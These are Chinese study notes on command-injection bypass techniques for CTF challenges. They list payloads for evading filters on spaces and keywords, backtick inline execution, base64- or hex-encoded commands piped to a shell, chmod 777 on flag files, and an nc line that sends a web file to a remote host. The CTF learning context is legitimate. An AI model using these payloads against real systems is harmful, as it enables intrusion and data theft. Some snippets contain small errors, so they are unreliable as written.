网络安全学习笔记——代码执行漏洞bypass

远程代码执行漏洞

0x00:管道符、命令执行函数

0x01:管道符

在用 linux 命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令

一、“;”分号用法

方式：command1 ; command2

用 ; 号隔开每个命令, 每个命令按照从左到右的顺序，顺序执行，彼此之间不关 心是否失败， 所有命令都会执行

二、“| ”符号用法

上一条命令的输出作为下一条命令参数——CTF中 ping 127.0.0.1 | ls(只执行 ls 不执行前面的）

方式：command1 | command2

Linux 所提供的管道符“|”将两个命令隔开，管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的输出会作为第二个 命令的输入，第二个命令的输出又会作为第三个命令的输入，依此类推 利用一个管道

# rpm -qa|grep licq 

这条命令使用一个管道符“|”建立了一个管道。管道将 rpm -qa 命令的输出（包括系统中所有安装的 RPM 包）作为 grep 命令的输入，从而列出带有 licq 字符的 RPM 包来 利用多个管道

# cat /etc/passwd | grep /bin/bash | wc -l 

这条命令使用了两个管道，利用第一个管道将 cat 命令（显示 passwd 文件的内容）的输出送给grep 命令，grep 命令找出含有“/bin /bash”的所有行

第 二个管道将 grep 的输出送给 wc 命令，wc 命令统计出输入中的行数。这个命令 的功能在于找出系统中有多少个用户使用 bash

三、“&”符号用法

ctf 中用法 ping 127.0.0.1 & ls(先执行 ls ，后执行 ping)

&放在启动参数后面表示设置此进程为后台进程

方式：command1 &

默认进程是前台进程，这时就把 Shell 给占据了，我们无法进行其他 操作，对于那些没有交互的进程，很多时候，我们希望将其在后台启动，可以在启动参数的时候加一个'&'实现这个目的

四、“&&”符号用法

ping 127.0.0.1 && ls（ping 命令正确才执行 ls ，要是 ping 1 && ls ，ls 就不会执行)

shell 在执行某个命令的时候，会返回一个返回值，该返回值保存在 shell 变量 $? 中。当 $? == 0 时，表示执行成功；当 $? == 1 时（我认为是非 0 数，返回值在 0-255 间），表示执行失败

有时候，下一条命令依赖前一条命令是否执行成功。如：在成功地执行一条命 令之后再执行另一条命令，或者在一条命令执行失败后再执行另一条命令等

shell 提供了 && 和 || 来实现命令执行控制的功能，shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行

语法格式如下：

command1 && command2 [&& command3 ...]

命令之间使用 && 连接，实现逻辑与的功能

只有在 && 左边的命令返回真（命令返回值 $? == 0），&& 右边的命令才会被执行

只要有一个命令返回假（命令返回值 $? == 1），后面的命令就不会被执行

五、“||”符号用法

和&&相反——左边为假才执行命令二

逻辑或的功能语法格式如下：

command1 || command2 [|| command3 ...]

命令之间使用 || 连接，实现逻辑或的功能

只有在 || 左边的命令返回假（命令返回值 $? == 1），|| 右边的命令才会执行。这和 c 语言中的逻辑或语法功能相同，即实现短路逻辑或操作。 只要有一个命令返回真（命令返回值 $? == 0），后面的命令就不会被执行。 直到返回真的地方停止执行

举例，ping 命令判断存活主机

ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 ||result=1
if [ "$result" == 0 ];then
echo "192.168.1.1 is UP!"
else
echo "192.168.2.1 is DOWN!"fi 

注意 &>要连起来写

六、空格绕过

0x01：一些绕过方式 ，%09也可以绕过空格，是PHP里面绕空格的非常好的方法

linux 操作系统

不是百分百成功的

以下两种成功率极高————${IFS}和$IFS$9都可代替空格，但是后者更好，前者的大括号大概率会被过滤
cat${IFS}flag.txt
cat$IFS$9flag.txt


{cat,flag.txt}
cat<flag.txt
cat<>flag.txt
ca\t fl\ag
kg=$'\x20flag.txt'&&cat$kg 

\x20 转换成字符串就是空格，这里通过变量的方式巧妙绕过

%20是URL编码，URL是给浏览器看的，不是给服务器看的，所以URL编码不能解析

windows操作系统

实用性不是很广，也就 type 这个命令可以用——可使用以下符号代替空格

 

type.\flag.txt
type,flag.txt
echo,123456 

七、通配符绕过

通配符用于绕过关键字——相当于模糊匹配，可在ls/显示的根目录下，匹配相应的flag或者其他需要的文件目录，只要文件名不冲突，一般都可以得到flag——所有都写为问号也可以匹配到，因为根目录下，大多数的都是目录格式，flag是文件格式—— 目录、文件夹、文件三者的区别_目录和文件夹_liaowenxiong的博客-CSDN博客

1、问号 ? ——单个字符

? 在 linux 里面可以进行代替单个字母—— /???/c?t flag.txt

cat 等命令不能使用 ? 通配符去匹配

如果要模糊匹配，在前面指定目录/bin/c?t即可，bin也可以使用?，但cat不能全为问号，因为三个字母的单词目录很多

虽然命令和文件没有本质区别——但是当前的cat命令在Linux下设置完环境变量之后，在任意的窗口底下都能执行cat命令，但cat本质还是放在bin目录下的文件（bin是存放一些可执行脚本/文本/文件的目录——在Linux操作系统下，万物皆文件）

2、星号 * ——多个字符

* 用于代替多个字母——如果当前目录下，只有一个可读写的文本时，也可以只使用 * 去匹配

3、内联执行——通杀技巧

target=127.0.0.1;echo"flag{qeuiwqhdjbcoeihoehwuifwoewo}">>flag.php

上述语句意为在当前目录下新建一个文件，内容为flag{qeuiwqhdjbcoeihoehwuifwoewo}，重定向至flag.php

执行后，当前目录就会多一个flag.php，然后127.0.0.1;cat flag.php 就会显示flag{qeuiwqhdjbcoeihoehwuifwoewo}

内联执行操作为——target=127.0.0.1;cat `ls`，执行后flag会直接出来：cat查看文件，ls列出当前目录下的所有文件，一整个操作就是查看当前目录的所有文件，所以就会显示flag.php和index.php，在CTF，等级考试等中，都会有奇效——反引号位于左上角tab键上方

?ip=127.0.0.1;cat$IFS$9`ls` 反引号内联，就是将反引号内命令的输出作为输入执行——也就是说，先执行ls，列出目录下的所有文件，然后cat查看文件内容

参考链接： 网络地址转化为数字地址

网络地址有另外一种表示形式，就是数字地址比如 127.0.0.1 可以转化为2130706433， 可以直接访问 http: //2130706433 或者 http: //0x7F000001， 这样就可以绕过 . 的ip过滤

转化网址—— 数字转IP地址|IP地址转数字|域名转数字IP地址|数字IP地理位置查询-站长工具

八、权限读取问题

1、注释符

%0acat

%09 ——绕过空格

%0Acat$IFS$9

%0acat<

2、查看文件的权限赋予权限

Linux操作系统存在权限问题，r 代表可读（代表数字4），w 可写（代表数字2），x 执行（代表数字1），一共是7，详见 linux权限详解

 

l's' -la ——查看文件是否有读权限，同时绕过关键字限制
c'h'm'o'd +777 /filename

但chmod命令可修改权限，一般来说，会设置为chmod 000 flag.php，将文件设置为不可写不可读不可执行的文件，cat读取文件内容就不会读到了，此时即使没有任何过滤，但是仍不会读到文件内容——要时常查看页面源代码，查看文件的权限

当发现flag文件没有读权限的时候，可以直接赋予权限，可以赋777（所有分组满权限），也可以赋444（所有分组读权限），chmod 777 flag.php，此时cat查看就没有问题了

和cat同级，同功能读取文件内容的语句：

如果非要用cat，也可以使用成对单引号绕过，如c'a't，c''at，后者不是百分百绕过

• cat：由第一行开始显示内容，并将所有内容输出
• tac：从最后一行倒序显示内容，并将所有内容输出
• more：根据窗口大小，一页一页的现实文件内容
• less：和 more 类似，但其优点可以往前翻页，而且进行可以搜索字符
• head：只显示头几行
• tail：只显示最后几行
• nl：类似于 cat -n，显示时输出行号
• tailf：类似于 tail -f
• sort%20/flag：读文件
• dir：来查看当前目录文件

九、REC花式读取文件内容

目标——获取 flag.txt 的内容，不是很实用

1、static-sh

static-sh ./flag.txt 

#输出结果：

./flag.txt: line 1: flag{this_is_a_test}: not found 

2、paste ——复制

paste ./flag.txt /etc/passwd 

#输出结果：

 

flag{this_is_a_test} root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync 

3、diff ——区别

diff ./flag.txt /etc/passwd 

#输出结果：

1c1,45
< flag{this_is_a_test}
\ No newline at end of file
---
> root:x:0:0:root:/root:/bin/bash 
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
> bin:x:2:2:bin:/bin:/usr/sbin/nologin 
> sys:x:3:3:sys:/dev:/usr/sbin/nologin 
> sync:x:4:65534:sync:/bin:/bin/sync 

4、od ——16进制读取

od -a ./flag.txt  -a 将od十六进制的内容自动进行解码

#输出结果：

flag { this_is_a_test }

5、bzmore

bzmore ./flag.txt 

#输出结果：

------> ./flag.txt <------
flag{this_is_a_test} 

6、bzless

bzless ./flag.txt
echo 'bzless ./flag.txt'

#输出结果：

------> ./flag.txt <------ flag{this_is_a_test} 

7、curl ——回显前端页面

curl file:///home/coffee/flag   可处理file协议和http协议
curl命令要指定根目录///flag，file协议后面只能跟绝对路径，pwd命令会显示当前路径

8、nc 

靶机：

nc 10.10.10.10 4444 < /var/www/html/key.php

接受机：

nc -l 4444 > key.txt 

9、wget 

 使用方法——get url -P path

1、空格过滤

空格可以用以下字符串代替： < 、<>、%09(tab)、$IFS$9、 ${IFS}、$IFS 等

$IFS （环境变量）在 linux 下表示分隔符，但是如果单纯的 cat$IFS2,bash 解释器会把整个IFS2 当做变量名，所以导致输不出来结果，然而如果加一个{}就固定了变量 名，同理在后面加个$可以起到截断的作用 ——但是为什么要用$9 呢，因为$9 只是当前系统 shell 进程的第九个参数的持有 者，它始终为空字符串

2、 一些命令分隔符

linux 中：%0a 、%0d 、; 、& 、| 、&&、||

windows 中：%0a、&、|、%1a（一个神奇的角色，作为.bat 文件中的命令分隔符）

%0a ——换行，但system支持多行执行，所以也行，%0d ——回车

3、绕过空格

①、$IFS ，${IFS} ，$IFS$1，//$1

改成$加其他数字貌似都行 < <> {cat,flag.php} ， // 用逗号实现了空格功能 %20 %09

有时会禁用 cat

解决方法是使用 tac 反向输出命令： linux 命令中可以加 \，所以甚至可以 ca\t /fl\ag ， 过滤了 bash 可以用 sh echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

拼接 flag 1;a=fl;b=ag.php;cat $a$b

其中有这么一条过滤方法，我们用上述方法无法绕过，但是我们只要改变一下顺序就可以：

②、拼接绕过

a=ag.php;b=fl;cat $b$a ，拼接完成之后就相当于cat flag，读取根目录下的flag，可以在 fl 前加 /

绕过空格就用上面提到的方法

$IFS$1 完整的 payload 1;a=ag.php;b=fl;cat$IFS$1$b$a
else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");} 

③、内联执行绕过

payload：cat$IFS$1'ls'

使用内联执行会将 ``内的输出作为前面命令的输入，当我们输入上述 payload时，等同于 cat flag.php;cat index.php

④、编码绕过

Hackerbar不能在Post Data里面直接进行base64编码，要放到 load框里面编码完之后再放回Post Data里

base64：
echo YWJjZGU=|base64 -d //打印出来 abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash     //cat flag.php
//先把cat flag.php进行编码，然后base64 -d进行解码，bash是Linux的shell命令，但不是每个都有bash
//如果没有bash的话，可以换sh执行
echo Y2F0IGZhbGcucGhw|base64 -d|sh    //cat flag.php

hex：
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.phpoct：
$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat
flag.php 

但这种方法因为过滤的原因这这个题上无法实现

对于关键字还可以用单引号和反斜杠绕过——比如 cat fl''ag cat fl\ag

总结一下，这题可用的 payload1;a=ag.php;b=fl;cat$IFS$1$b$a 和 cat$IFS$1'ls' 得到的 flag 查看源码

当 /被过滤可以使用：

Windows系列支持的管道符

• |：直接执行后面的语句，例如：ping 127.0.0.1|whoami
• ||：如果前面执行的语句执行出错，则执行后面的语句，前面的语句只能为假。例如ping 2||whoami
• &：如果前面的语句为假则直接执行后面的语句，前面的语句可真可假。例如：ping 127.0.0.1&whoami
• &&：如果前面的语句为假直接出错，也不执行后面的语句，前面的语句只能为真。例如：ping 127.0.0.1&&whoami

Linux系统支持的管道符

• ; ：无论前面真假，执行完前面的语句再执行后面的。例如：ping 127.0.0.1;whoami
• |：显示后面语句执行的结果，例如：ping 127.0.0.1|whoami
• ||：当前面执行的语句出错时，执行后面的语句。例如ping 1||whoami
• &：如果前面的语句为假则直接执行后面的语句，前面的语句可真可假。例如：ping 127.0.0.1&whoami
• &&：如果前面的语句为假直接出错，也不执行后面的语句，前面的语句只能为真。例如：ping 127.0.0.1&&whoami